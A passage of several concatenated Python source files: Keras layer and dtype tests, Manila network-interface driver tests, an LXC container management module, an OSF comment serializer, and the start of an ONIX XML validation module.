return math_ops.reduce_sum(model.losses)
assert_graph(get_losses(constant_op.constant(2.)))
assert_graph(get_losses(constant_op.constant(0.5)))
def test_conditional_metrics_in_call(self):
class MyLayer(base_layer.Layer):
def __init__(self):
super(MyLayer,
self).__init__(dynamic=testing_utils.should_run_eagerly())
def call(self, inputs, training=None):
if training:
self.add_metric(math_ops.reduce_sum(inputs),
name='sum',
aggregation='mean')
return inputs
def compute_output_shape(self, input_shape):
return input_shape
inputs = input_layer.Input((3,))
layer = MyLayer()
outputs = layer(inputs)
model = training_lib.Model(inputs, outputs)
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(np.ones((2, 3)), np.ones((2, 3)))
self.assertEqual(history.history['sum'][-1], 2 * 3)
def test_conditional_activity_regularizer_in_call(self):
class TestModel(training_lib.Model):
def __init__(self):
super(TestModel, self).__init__(
name='test_model', dynamic=testing_utils.should_run_eagerly())
self.layer = layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
if math_ops.greater(math_ops.reduce_sum(x), 0.0):
return self.layer(x)
else:
return self.layer(x)
model = TestModel()
model.compile(
loss='mse',
optimizer='sgd',
run_eagerly=testing_utils.should_run_eagerly())
x = np.ones(shape=(10, 1))
y = np.ones(shape=(10, 2))
if testing_utils.should_run_eagerly():
model.fit(x, y, epochs=2, batch_size=5)
else:
with self.assertRaisesRegexp(errors_impl.InaccessibleTensorError,
'ActivityRegularizer'):
model.fit(x, y, epochs=2, batch_size=5)
def test_conditional_activity_regularizer_with_wrappers_in_call(self):
class TestModel(training_lib.Model):
def __init__(self):
super(TestModel, self).__init__(
name='test_model', dynamic=testing_utils.should_run_eagerly())
self.layer = layers.TimeDistributed(
layers.Dense(2, activity_regularizer='l2'), input_shape=(3, 4))
def call(self, x, training=None):
if math_ops.greater(math_ops.reduce_sum(x), 0.0):
return self.layer(x)
else:
return self.layer(x)
model = TestModel()
model.compile(
loss='mse',
optimizer='sgd',
run_eagerly=testing_utils.should_run_eagerly())
x = np.ones(shape=(10, 3, 4))
y = np.ones(shape=(10, 3, 2))
if testing_utils.should_run_eagerly():
model.fit(x, y, epochs=2, batch_size=5)
else:
with self.assertRaisesRegexp(errors_impl.InaccessibleTensorError,
'ActivityRegularizer'):
model.fit(x, y, epochs=2, batch_size=5)
class AddLayer(base_layer.Layer):
"""A layer which adds its input to a variable.
Useful for testing a layer with a variable
"""
def build(self, _):
self.v = self.add_weight('v', (), initializer='ones')
self.built = True
def call(self, inputs):
return inputs + self.v
class IdentityLayer(base_layer.Layer):
"""A layer that returns its input.
Useful for testing a layer without a variable.
"""
def call(self, inputs):
return inputs
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
class DTypeTest(keras_parameterized.TestCase):
# This class only have tests relating to layer.dtype. Tests for dtype policies
# are in mixed_precision/experimental/keras_test.py
# TODO(reedwm): Maybe have a separate test file for input casting tests.
def _const(self, dtype):
return array_ops.constant(1, dtype=dtype)
@testing_utils.enable_v2_dtype_behavior
def test_dtype_defaults_to_floatx(self):
layer = AddLayer()
self.assertEqual(layer.dtype, 'float32')
layer(self._const('float64'))
self.assertEqual(layer.dtype, 'float32') # dtype should not change
try:
backend.set_floatx('float64')
layer = AddLayer()
self.assertEqual(layer.dtype, 'float64')
finally:
backend.set_floatx('float32')
@testing_utils.enable_v2_dtype_behavior
def test_passing_dtype_to_constructor(self):
layer = IdentityLayer(dtype='float64')
layer(self._const('float32'))
self.assertEqual(layer.dtype, 'float64')
layer = IdentityLayer(dtype='int32')
layer(self._const('float32'))
self.assertEqual(layer.dtype, 'int32')
layer = IdentityLayer(dtype=dtypes.float64)
layer(self._const('float32'))
self.assertEqual(layer.dtype, 'float64')
@testing_utils.enable_v2_dtype_behavior
def input_cast_to_dtype(self):
layer = AddLayer()
# Input should be cast to layer.dtype, so output should also be layer.dtype
self.assertEqual(layer(self._const('float64')).dtype, 'float32')
layer = AddLayer(dtype='float64')
self.assertEqual(layer(self._const('float32')).dtype, 'float64')
# Test inputs are not casted if layer.dtype is not floating-point
layer = IdentityLayer(dtype='int32')
self.assertEqual(layer(self._const('float64')).dtype, 'float64')
# Test inputs are not casted if the inputs are not floating-point
layer = IdentityLayer(dtype='float32')
self.assertEqual(layer(self._const('int32')).dtype, 'int32')
# Test Numpy arrays are casted
layer = IdentityLayer(dtype='float64')
self.assertEqual(layer(np.array(1, dtype='float32')).dtype, 'float64')
# Test Python floats are casted
layer = IdentityLayer(dtype='float64')
self.assertEqual(layer(1.).dtype, 'float64')
@testing_utils.enable_v2_dtype_behavior
def multiple_inputs_cast_to_dtype(self):
class MultiIdentityLayer(base_layer.Layer):
def call(self, inputs):
return [array_ops.identity(x) for x in inputs]
# Testing layer with default dtype of float32
layer = MultiIdentityLayer()
x, y = layer([self._const('float16'), self._const('float32')])
self.assertEqual(x.dtype, 'float32')
self.assertEqual(y.dtype, 'float32')
# Test passing dtype to the constructor
layer = MultiIdentityLayer(dtype='float64')
x, y = layer([self._const('float16'), self._const('float32')])
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'float64')
# Test several non-floating point types
layer = MultiIdentityLayer(dtype='float64')
x, y, z, w = layer([self._const('float16'), self._const('bool'),
self._const('float64'), self._constant('complex64')])
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'bool')
self.assertEqual(z.dtype, 'float64')
self.assertEqual(w.dtype, 'complex64')
@testing_utils.enable_v2_dtype_behavior
def test_extra_args_and_kwargs_not_casted(self):
class IdentityLayerWithArgs(base_layer.Layer):
def call(self, inputs, *args, **kwargs):
return nest.flatten([inputs, args, kwargs])
layer = IdentityLayerWithArgs(dtype='float64')
x, y, z = layer(self._const('float16'), self._const('float16'),
kwarg=self._const('float16'))
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'float16')
self.assertEqual(z.dtype, 'float16')
@testing_utils.enable_v2_dtype_behavior
def test_layer_without_autocast(self):
class IdentityLayerWithoutAutocast(IdentityLayer):
def __init__(self, *args, **kwargs):
kwargs['autocast'] = False
super(IdentityLayerWithoutAutocast, self).__init__(*args, **kwargs)
layer = IdentityLayerWithoutAutocast(dtype='float64')
self.assertEqual(layer(self._const('float32')).dtype, 'float32')
@testing_utils.enable_v2_dtype_behavior
def test_dtype_warnings(self):
# Test a layer warns when it casts inputs.
layer = IdentityLayer()
with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
layer(self._const('float64'))
self.assertRegexpMatches(
str(mock_warn.call_args),
".*from dtype float64 to the layer's dtype of float32.*"
"The layer has dtype float32 because.*")
# Test a layer does not warn a second time
with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
layer(self._const('float64'))
mock_warn.assert_not_called()
# Test a new layer can warn even if a different layer already warned
layer = IdentityLayer()
with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
layer(self._const('float64'))
self.assertRegexpMatches(
str(mock_warn.call_args),
".*from dtype float64 to the layer's dtype of float32.*"
"The layer has dtype float32 because.*")
# Test a layer does not warn if a dtype is passed
layer = IdentityLayer(dtype='float32')
with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
layer(self._const('float64'))
mock_warn.assert_not_called()
# Test a layer does not warn if a Policy is set:
with policy.policy_scope('float32'):
layer = IdentityLayer()
with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
layer(self._const('float64'))
mock_warn.assert_not_called()
@testing_utils.enable_v2_dtype_behavior
def test_compute_output_signature(self):
class IdentityLayerWithOutputShape(IdentityLayer):
def compute_output_shape(self, input_shape):
return input_shape
layer = IdentityLayerWithOutputShape(dtype='float64')
output_signature = layer.compute_output_signature(
tensor_spec.TensorSpec(shape=(), dtype='float32'))
self.assertEqual(output_signature.shape, ())
self.assertEqual(output_signature.dtype, 'float64')
@testing_utils.enable_v2_dtype_behavior
def test_composite_tensors_input_casting(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.constant([[0, 1], [2, 3]], dtype='int64'),
values=array_ops.constant([0., 1.], dtype='float32'),
dense_shape=array_ops.constant([4, 4], dtype='int64'))
ragged = ragged_tensor.RaggedTensor.from_row_splits(
values=array_ops.constant([1., 2., 3.], dtype='float32'),
row_splits=array_ops.constant([0, 2, 2, 3], dtype='int64'))
layer = IdentityLayer(dtype='float16')
layer._supports_ragged_inputs = True
for x in sparse, ragged:
self.assertEqual(x.dtype, 'float32')
y = layer(x)
self.assertEqual(y.dtype, 'float16')
self.assertEqual(type(x), type(y))
def test_supports_ragged_inputs_attribute_error(self):
with self.assertRaisesRegexp(ValueError,
'does not support RaggedTensors'):
ragged = ragged_tensor.RaggedTensor.from_row_splits(
values=array_ops.constant([1., 2., 3.], dtype='float32'),
row_splits=array_ops.constant([0, 2, 2, 3], dtype='int64'))
model = sequential.Sequential([
input_layer.InputLayer(input_shape=(None,), ragged=True),
IdentityLayer()
])
model.compile(rmsprop.RMSprop(0.001), loss='mse')
model.train_on_batch(ragged)
@testing_utils.enable_v2_dtype_behavior
def test_passing_non_tensor(self):
layer = IdentityLayer()
x = object()
y = layer(x) # Layer should not cast 'x', as it's not a tensor
self.assertIs(x, y)
@testing_utils.disable_v2_dtype_behavior
def test_v1_behavior(self):
# Test dtype defaults to None and inferred from input
layer = IdentityLayer()
self.assertIsNone(layer.dtype)
layer(self._const('float64'))
self.assertEqual(layer.dtype, 'float64')
# Test layer does not cast to dtype
self.assertEqual(layer(self._const('float32')).dtype, 'float32')
if __name__ == '__main__':
ops.enable_eager_execution()
test.main()
| |
# Copyright 2014 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from manila.network.linux import interface
from manila.network.linux import ip_lib
from manila import test
from manila.tests import conf_fixture
from manila import utils
class BaseChild(interface.LinuxInterfaceDriver):
def plug(*args):
pass
def unplug(*args):
pass
FakeSubnet = {
'cidr': '192.168.1.1/24',
}
FakeAllocation = {
'subnet': FakeSubnet,
'ip_address': '192.168.1.2',
'ip_version': 4,
}
FakePort = {
'id': 'abcdef01-1234-5678-90ab-ba0987654321',
'fixed_ips': [FakeAllocation],
'device_id': 'cccccccc-cccc-cccc-cccc-cccccccccccc',
}
class TestBase(test.TestCase):
def setUp(self):
super(TestBase, self).setUp()
self.conf = conf_fixture.CONF
self.conf.register_opts(interface.OPTS)
self.ip_dev_p = mock.patch.object(ip_lib, 'IPDevice')
self.ip_dev = self.ip_dev_p.start()
self.ip_p = mock.patch.object(ip_lib, 'IPWrapper')
self.ip = self.ip_p.start()
self.device_exists_p = mock.patch.object(ip_lib, 'device_exists')
self.device_exists = self.device_exists_p.start()
self.addCleanup(self.ip_dev_p.stop)
self.addCleanup(self.ip_p.stop)
self.addCleanup(self.device_exists_p.stop)
class TestABCDriver(TestBase):
def test_verify_abs_class_has_abs_methods(self):
class ICanNotBeInstancetiated(interface.LinuxInterfaceDriver):
pass
try:
ICanNotBeInstancetiated()
except TypeError:
pass
except Exception as e:
self.fail("Unexpected exception thrown: '%s'" % six.text_type(e))
else:
self.fail("ExpectedException 'TypeError' not thrown.")
def test_get_device_name(self):
bc = BaseChild()
device_name = bc.get_device_name(FakePort)
self.assertEqual('tapabcdef01-12', device_name)
def test_l3_init(self):
addresses = [dict(ip_version=4, scope='global',
dynamic=False, cidr='172.16.77.240/24')]
self.ip_dev().addr.list = mock.Mock(return_value=addresses)
bc = BaseChild()
ns = '12345678-1234-5678-90ab-ba0987654321'
bc.init_l3('tap0', ['192.168.1.2/24'], namespace=ns)
self.ip_dev.assert_has_calls(
[mock.call('tap0', namespace=ns),
mock.call().addr.list(scope='global', filters=['permanent']),
mock.call().addr.add(4, '192.168.1.2/24', '192.168.1.255'),
mock.call().addr.delete(4, '172.16.77.240/24')])
class TestOVSInterfaceDriver(TestBase):
def test_get_device_name(self):
br = interface.OVSInterfaceDriver()
device_name = br.get_device_name(FakePort)
self.assertEqual('tapabcdef01-12', device_name)
def test_plug_no_ns(self):
self._test_plug()
def test_plug_with_ns(self):
self._test_plug(namespace='01234567-1234-1234-99')
def test_plug_alt_bridge(self):
self._test_plug(bridge='br-foo')
def _test_plug(self, additional_expectation=None, bridge=None,
namespace=None):
if additional_expectation is None:
additional_expectation = []
if not bridge:
bridge = 'br-int'
def device_exists(dev, namespace=None):
return dev == bridge
vsctl_cmd = ['ovs-vsctl', '--', '--may-exist', 'add-port',
bridge, 'tap0', '--', 'set', 'Interface', 'tap0',
'type=internal', '--', 'set', 'Interface', 'tap0',
'external-ids:iface-id=port-1234', '--', 'set',
'Interface', 'tap0',
'external-ids:iface-status=active', '--', 'set',
'Interface', 'tap0',
'external-ids:attached-mac=aa:bb:cc:dd:ee:ff']
with mock.patch.object(utils, 'execute') as execute:
ovs = interface.OVSInterfaceDriver()
self.device_exists.side_effect = device_exists
ovs.plug('tap0',
'port-1234',
'aa:bb:cc:dd:ee:ff',
bridge=bridge,
namespace=namespace)
execute.assert_called_once_with(*vsctl_cmd, run_as_root=True)
expected = [mock.call(),
mock.call().device('tap0'),
mock.call().device().link.set_address('aa:bb:cc:dd:ee:ff')]
expected.extend(additional_expectation)
if namespace:
expected.extend(
[mock.call().ensure_namespace(namespace),
mock.call().ensure_namespace().add_device_to_namespace(
mock.ANY)])
expected.extend([mock.call().device().link.set_up()])
self.ip.assert_has_calls(expected)
def test_unplug(self, bridge=None):
if not bridge:
bridge = 'br-int'
with mock.patch('manila.network.linux.ovs_lib.OVSBridge') as ovs_br:
ovs = interface.OVSInterfaceDriver()
ovs.unplug('tap0')
ovs_br.assert_has_calls([mock.call(bridge),
mock.call().delete_port('tap0')])
class TestBridgeInterfaceDriver(TestBase):
def test_get_device_name(self):
br = interface.BridgeInterfaceDriver()
device_name = br.get_device_name(FakePort)
self.assertEqual('ns-abcdef01-12', device_name)
def test_plug_no_ns(self):
self._test_plug()
def test_plug_with_ns(self):
self._test_plug(namespace='01234567-1234-1234-99')
def _test_plug(self, namespace=None, mtu=None):
def device_exists(device, root_helper=None, namespace=None):
return device.startswith('brq')
root_veth = mock.Mock()
ns_veth = mock.Mock()
self.ip().add_veth = mock.Mock(return_value=(root_veth, ns_veth))
self.device_exists.side_effect = device_exists
br = interface.BridgeInterfaceDriver()
mac_address = 'aa:bb:cc:dd:ee:ff'
br.plug('ns-0',
'port-1234',
mac_address,
namespace=namespace)
ip_calls = [mock.call(),
mock.call().add_veth('tap0', 'ns-0', namespace2=namespace)]
ns_veth.assert_has_calls([mock.call.link.set_address(mac_address)])
self.ip.assert_has_calls(ip_calls)
root_veth.assert_has_calls([mock.call.link.set_up()])
ns_veth.assert_has_calls([mock.call.link.set_up()])
def test_plug_dev_exists(self):
self.device_exists.return_value = True
with mock.patch('manila.network.linux.interface.LOG.warning') as log:
br = interface.BridgeInterfaceDriver()
br.plug('port-1234',
'tap0',
'aa:bb:cc:dd:ee:ff')
self.ip_dev.assert_has_calls([])
self.assertEqual(1, log.call_count)
def test_unplug_no_device(self):
self.device_exists.return_value = False
self.ip_dev().link.delete.side_effect = RuntimeError
with mock.patch('manila.network.linux.interface.LOG') as log:
br = interface.BridgeInterfaceDriver()
br.unplug('tap0')
[mock.call(), mock.call('tap0'), mock.call().link.delete()]
self.assertEqual(1, log.error.call_count)
def test_unplug(self):
self.device_exists.return_value = True
with mock.patch('manila.network.linux.interface.LOG.debug') as log:
br = interface.BridgeInterfaceDriver()
br.unplug('tap0')
self.assertTrue(log.called)
self.ip_dev.assert_has_calls([mock.call('tap0', None),
mock.call().link.delete()])
| |
import os
from .service import LXCService
from .overlayutils import OverlayGroup
from . import constants
from .meta import LXCMeta
class LXCAlreadyStarted(Exception):
def __init__(self, name):
message = 'LXC named "%s" is already running' % name
super(LXCAlreadyStarted, self).__init__(message)
class LXCDoesNotExist(Exception):
def __init__(self, name):
message = 'LXC named "%s" does not exist' % name
super(LXCDoesNotExist, self).__init__(message)
class LXCHasNoMeta(Exception):
def __init__(self, name):
message = 'LXC named "%s" has no BoundLXCMeta' % name
super(LXCHasNoMeta, self).__init__(message)
class UnknownLXCType(Exception):
pass
def create_lxc(name, template='ubuntu', service=None):
"""Factory method for the generic LXC"""
service = service or LXCService
service.create(name, template=template)
meta = LXCMeta(initial=dict(type='LXC'))
lxc = LXC.with_meta(name, service, meta, save=True)
return lxc
class LXC(object):
"""The standard LXC"""
@classmethod
def with_meta(cls, name, service, meta, save=False):
lxc = cls(name, service)
lxc.bind_meta(meta, save=save)
return lxc
@classmethod
def from_meta(cls, name, service, meta):
return cls.with_meta(name, service, meta)
def __init__(self, name, service):
self.name = name
self._service = service
self._meta = None
def start(self):
"""Start this LXC"""
if self.status == 'RUNNING':
raise LXCAlreadyStarted(self.name)
self._service.start(self.name)
def stop(self):
"""Stop this LXC"""
self._service.stop(self.name)
def destroy(self):
self._service.destroy(self.name)
@property
def status(self):
info = self._service.info(self.name)
return info['state']
@property
def pid(self):
info = self._service.info(self.name)
return int(info['pid'])
def path(self, *join_paths):
return self._service.lxc_path(self.name, *join_paths)
def __repr__(self):
return '<%s "%s">' % (self.__class__.__name__, self.name)
@property
def meta(self):
meta = self._meta
if not meta:
raise LXCHasNoMeta(self.name)
return meta
def bind_meta(self, meta, save=False):
if save:
self._meta = meta.bind_and_save(self)
else:
self._meta = meta.bind(self)
def create_lxc_with_overlays(name, base, overlays, overlay_temp_path=None,
service=None):
"""Creates an LXC using overlays.
This is a fast process in comparison to LXC.create because it does not
involve any real copying of data.
"""
service = service or LXCService
# Check that overlays has content
if not overlays:
raise TypeError("Argument 'overlays' must have at least one item")
# Get the system's LXC path
lxc_path = service.lxc_path()
# Calculate base LXC's path
base_path = os.path.join(lxc_path, base)
# Calculate the new LXC's path
new_path = os.path.join(lxc_path, name)
# Create the new directory if it doesn't exist
if not os.path.exists(new_path):
os.mkdir(new_path)
overlay_group = OverlayGroup.create(new_path, base_path, overlays)
initial_meta = dict(type='LXCWithOverlays',
overlay_group=overlay_group.meta())
meta = LXCMeta(initial=initial_meta)
return LXCWithOverlays.with_meta(name, service, meta, overlay_group,
save=True)
class UnmanagedLXCError(Exception):
pass
class UnmanagedLXC(LXC):
"""An LXC that was created without lxc4u metadata"""
def destroy(self, force=False):
"""UnmanagedLXC Destructor.
It requires force to be true in order to work. Otherwise it throws an
error.
"""
if force:
super(UnmanagedLXC, self).destroy()
else:
raise UnmanagedLXCError('Destroying an unmanaged LXC might not '
'work. To continue please call this method with force=True')
class LXCWithOverlays(LXC):
"""An LXC that has an overlay group"""
@classmethod
def with_meta(cls, name, service, meta, overlay_group, save=False):
lxc = cls(name, service, overlay_group)
lxc.bind_meta(meta, save=save)
return lxc
@classmethod
def from_meta(cls, name, service, meta):
overlay_group_meta = meta.get('overlay_group')
overlay_group = OverlayGroup.from_meta(overlay_group_meta)
return cls.with_meta(name, service, meta, overlay_group)
def __init__(self, name, service, overlay_group):
self._overlay_group = overlay_group
super(LXCWithOverlays, self).__init__(name, service)
def destroy(self):
"""Unmounts overlay and deletes it's own directory"""
self._overlay_group.destroy()
def top_overlay(self):
"""Returns top overlay from the overlay group"""
return self._overlay_group.top()
class LXCLoader(object):
def __init__(self, types, service):
self._types = types
self._service = service
def load(self, name, meta):
lxc_type_name = meta.get('type', constants.DEFAULT_LXC_TYPE_KEY)
lxc_type_cls = self._types.get(lxc_type_name)
if not lxc_type_cls:
raise UnknownLXCType('LXC type "%s" is unknown' % lxc_type_name)
return lxc_type_cls.from_meta(name, self._service, meta)
class LXCManager(object):
"""Manages the currently available LXCs"""
def __init__(self, loader, service):
self._service = service
self._loader = loader
def list(self):
"""Get's all of the LXC's and creates objects for them"""
service = self._service
lxc_names = service.list_names()
lxc_list = []
for name in lxc_names:
lxc = self.get(name)
lxc_list.append(lxc)
return lxc_list
def get(self, name):
"""Retrieves a single LXC by name"""
lxc_meta_path = self._service.lxc_path(name,
constants.LXC_META_FILENAME)
meta = LXCMeta.load_from_file(lxc_meta_path)
lxc = self._loader.load(name, meta)
return lxc
| |
import bleach
from rest_framework import serializers as ser
from modularodm import Q
from osf.exceptions import ValidationError as ModelValidationError
from framework.auth.core import Auth
from framework.exceptions import PermissionsError
from framework.guid.model import Guid
from website.files.models import StoredFileNode
from website.project.model import Comment
from rest_framework.exceptions import ValidationError, PermissionDenied
from api.base.exceptions import InvalidModelValueError, Conflict
from api.base.utils import absolute_reverse
from api.base.settings import osf_settings
from api.base.serializers import (JSONAPISerializer,
TargetField,
RelationshipField,
IDField, TypeField, LinksField,
AuthorizedCharField, DateByVersion,)
from website.project.spam.model import SpamStatus
class CommentReport(object):
def __init__(self, user_id, category, text):
self._id = user_id
self.category = category
self.text = text
class CommentSerializer(JSONAPISerializer):
filterable_fields = frozenset([
'deleted',
'date_created',
'date_modified',
'page',
'target'
])
id = IDField(source='_id', read_only=True)
type = TypeField()
content = AuthorizedCharField(source='get_content', required=True)
page = ser.CharField(read_only=True)
target = TargetField(link_type='related', meta={'type': 'get_target_type'})
user = RelationshipField(related_view='users:user-detail', related_view_kwargs={'user_id': '<user._id>'})
reports = RelationshipField(related_view='comments:comment-reports', related_view_kwargs={'comment_id': '<_id>'})
date_created = DateByVersion(read_only=True)
date_modified = DateByVersion(read_only=True)
modified = ser.BooleanField(read_only=True, default=False)
deleted = ser.BooleanField(read_only=True, source='is_deleted', default=False)
is_abuse = ser.SerializerMethodField(help_text='If the comment has been reported or confirmed.')
is_ham = ser.SerializerMethodField(help_text='Comment has been confirmed as ham.')
has_report = ser.SerializerMethodField(help_text='If the user reported this comment.')
has_children = ser.SerializerMethodField(help_text='Whether this comment has any replies.')
can_edit = ser.SerializerMethodField(help_text='Whether the current user can edit this comment.')
# LinksField.to_representation adds link to "self"
links = LinksField({})
class Meta:
type_ = 'comments'
def get_is_ham(self, obj):
if obj.spam_status == SpamStatus.HAM:
return True
return False
def get_has_report(self, obj):
user = self.context['request'].user
if user.is_anonymous():
return False
return user._id in obj.reports and not obj.reports[user._id].get('retracted', True)
def get_is_abuse(self, obj):
if obj.spam_status == SpamStatus.FLAGGED or obj.spam_status == SpamStatus.SPAM:
return True
return False
def get_can_edit(self, obj):
user = self.context['request'].user
if user.is_anonymous():
return False
return obj.user._id == user._id and obj.node.can_comment(Auth(user))
def get_has_children(self, obj):
return Comment.find(Q('target', 'eq', Guid.load(obj._id))).count() > 0
def get_absolute_url(self, obj):
return absolute_reverse('comments:comment-detail', kwargs={
'comment_id': obj._id,
'version': self.context['request'].parser_context['kwargs']['version']
})
def update(self, comment, validated_data):
assert isinstance(comment, Comment), 'comment must be a Comment'
auth = Auth(self.context['request'].user)
if validated_data:
if validated_data.get('is_deleted', None) is False and comment.is_deleted:
try:
comment.undelete(auth, save=True)
except PermissionsError:
raise PermissionDenied('Not authorized to undelete this comment.')
elif validated_data.get('is_deleted', None) is True and not comment.is_deleted:
try:
comment.delete(auth, save=True)
except PermissionsError:
raise PermissionDenied('Not authorized to delete this comment.')
elif 'get_content' in validated_data:
content = validated_data.pop('get_content')
try:
comment.edit(content, auth=auth, save=True)
except PermissionsError:
raise PermissionDenied('Not authorized to edit this comment.')
except ModelValidationError as err:
raise ValidationError(err.messages[0])
return comment
def get_target_type(self, obj):
if not getattr(obj.referent, 'target_type', None):
raise InvalidModelValueError(
source={'pointer': '/data/relationships/target/links/related/meta/type'},
detail='Invalid comment target type.'
)
return obj.referent.target_type
def sanitize_data(self):
ret = super(CommentSerializer, self).sanitize_data()
content = self.validated_data.get('get_content', None)
if content:
ret['get_content'] = bleach.clean(content)
return ret
class RegistrationCommentSerializer(CommentSerializer):
replies = RelationshipField(related_view='registrations:registration-comments', related_view_kwargs={'node_id': '<node._id>'}, filter={'target': '<_id>'})
node = RelationshipField(related_view='registrations:registration-detail', related_view_kwargs={'node_id': '<node._id>'})
class NodeCommentSerializer(CommentSerializer):
replies = RelationshipField(related_view='nodes:node-comments', related_view_kwargs={'node_id': '<node._id>'}, filter={'target': '<_id>'})
node = RelationshipField(related_view='nodes:node-detail', related_view_kwargs={'node_id': '<node._id>'})
class CommentCreateSerializer(CommentSerializer):
target_type = ser.SerializerMethodField(method_name='get_validated_target_type')
def get_validated_target_type(self, obj):
target = obj.target
target_type = self.context['request'].data.get('target_type')
expected_target_type = self.get_target_type(target)
if target_type != expected_target_type:
raise Conflict(detail=('The target resource has a type of "{}", but you set the json body\'s type field to "{}". You probably need to change the type field to match the target resource\'s type.'.format(expected_target_type, target_type)))
return target_type
def get_target(self, node_id, target_id):
target = Guid.load(target_id)
if not target or not getattr(target.referent, 'belongs_to_node', None):
raise ValueError('Invalid comment target.')
elif not target.referent.belongs_to_node(node_id):
raise ValueError('Cannot post to comment target on another node.')
elif isinstance(target.referent, StoredFileNode) and target.referent.provider not in osf_settings.ADDONS_COMMENTABLE:
raise ValueError('Comments are not supported for this file provider.')
return target
def create(self, validated_data):
user = validated_data['user']
auth = Auth(user)
node = validated_data['node']
target_id = self.context['request'].data.get('id')
try:
target = self.get_target(node._id, target_id)
except ValueError:
raise InvalidModelValueError(
source={'pointer': '/data/relationships/target/data/id'},
detail='Invalid comment target \'{}\'.'.format(target_id)
)
validated_data['target'] = target
validated_data['content'] = validated_data.pop('get_content')
try:
comment = Comment.create(auth=auth, **validated_data)
except PermissionsError:
raise PermissionDenied('Not authorized to comment on this project.')
except ModelValidationError as err:
raise ValidationError(err.messages[0])
return comment
class CommentDetailSerializer(CommentSerializer):
"""
Overrides CommentSerializer to make id required.
"""
id = IDField(source='_id', required=True)
deleted = ser.BooleanField(source='is_deleted', required=True)
class RegistrationCommentDetailSerializer(RegistrationCommentSerializer):
id = IDField(source='_id', required=True)
deleted = ser.BooleanField(source='is_deleted', required=True)
class NodeCommentDetailSerializer(NodeCommentSerializer):
id = IDField(source='_id', required=True)
deleted = ser.BooleanField(source='is_deleted', required=True)
class CommentReportSerializer(JSONAPISerializer):
id = IDField(source='_id', read_only=True)
type = TypeField()
category = ser.ChoiceField(choices=[('spam', 'Spam or advertising'),
('hate', 'Hate speech'),
('violence', 'Violence or harmful behavior')], required=True)
message = ser.CharField(source='text', required=False, allow_blank=True)
links = LinksField({'self': 'get_absolute_url'})
class Meta:
type_ = 'comment_reports'
def get_absolute_url(self, obj):
return absolute_reverse(
'comments:report-detail',
kwargs={
'user_id': obj._id,
'comment_id': self.context['request'].parser_context['kwargs']['comment_id'],
'version': self.context['request'].parser_context['kwargs']['version']
}
)
def create(self, validated_data):
user = self.context['request'].user
comment = self.context['view'].get_comment()
if user._id in comment.reports and not comment.reports[user._id].get('retracted', True):
raise ValidationError('Comment already reported.')
try:
comment.report_abuse(user, save=True, **validated_data)
except ValueError:
raise ValidationError('You cannot report your own comment.')
return CommentReport(user._id, **validated_data)
def update(self, comment_report, validated_data):
user = self.context['request'].user
comment = self.context['view'].get_comment()
if user._id != comment_report._id:
raise ValidationError('You cannot report a comment on behalf of another user.')
try:
comment.report_abuse(user, save=True, **validated_data)
except ValueError:
raise ValidationError('You cannot report your own comment.')
return CommentReport(user._id, **validated_data)
class CommentReportDetailSerializer(CommentReportSerializer):
"""
Overrides CommentReportSerializer to make id required.
"""
id = IDField(source='_id', required=True)
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
from collections import namedtuple
from defusedxml import lxml
from lxml import etree
from onixcheck import schema
from onixcheck.exeptions import OnixError, get_logger
log = get_logger()
class OnixFile(object):
"""Convenience file object wrapper.
:param infile: File or path to file
:type infile: file or str
"""
def __init__(self, infile):
self.infile = infile
self.meta = OnixMeta.from_file(infile)
if hasattr(infile, 'seek'):
self.infile.seek(0)
def xml_tree(self):
"""
Parse the infile with lxml and add the proper namespace if required.
:return etree.ElementTree: An lxml ElementTree with proper namespace
"""
if hasattr(self.infile, 'seek'):
self.infile.seek(0)
tree = lxml.parse(self.infile)
if self.meta.namespaces:
return tree
log.debug('Adding namespaces to xml for validation')
root = tree.getroot()
ns_root = etree.Element(
tree.docinfo.root_name,
root.attrib,
nsmap={None: self.meta.get_ns_string()}
)
ns_root[:] = root[:]
# Roundtrip to add namespace
doc = lxml.tostring(
ns_root,
encoding=tree.docinfo.encoding,
xml_declaration=True,
pretty_print=True
)
ns_tree = lxml.fromstring(doc)
return etree.ElementTree(ns_tree)
def get_validator(self, schema_type='xsd'):
"""
Create a matching validator for the ONIX file.
:return etree._Validator:
"""
parser = self.meta.SCHEMA_TYPE_PARSER_MAP[schema_type]
return parser(file=self.meta.get_schema_file(schema_type=schema_type))
_BaseMeta = namedtuple('OnixMeta', 'xml_version xml_encoding onix_version onix_style namespaces')
class OnixMeta(_BaseMeta):
"""Read and detect minimal ONIX file properties needed for validation.
Onix XML files may or may not have `release` and `xmlns` attributes on
their root element. OnixMeta.from_file(infile) will detect Onix Version
and Style and also patch the root element with the appropriate namespace
needed for validation.
:param str xml_version: XML Version as str ("1.0").
:param str xml_encoding: XML Encoding as str ("utf-8").
:param str onix_version: Onix Version as string ("2.1" or "3.0")
:param str onix_style: Onix Style as str ("short" or "reference")
:param dict namespaces: dict of str with namspaces from the root element
"""
#: ONIX Version 2.1
V21 = '2.1'
#: ONIX Version 3.0
V30 = '3.0'
#: Short notation
SHORT = 'short'
#: Reference notation
REFERENCE = 'reference'
#: Schema Types
XSD = 'xsd'
RNG = 'rng'
ONIX_VERSIONS = (V21, V30)
ONIX_STYLES = (SHORT, REFERENCE)
SCHEMA_MAP = {
(V21, SHORT, XSD): schema.O21_XSD_SHORT,
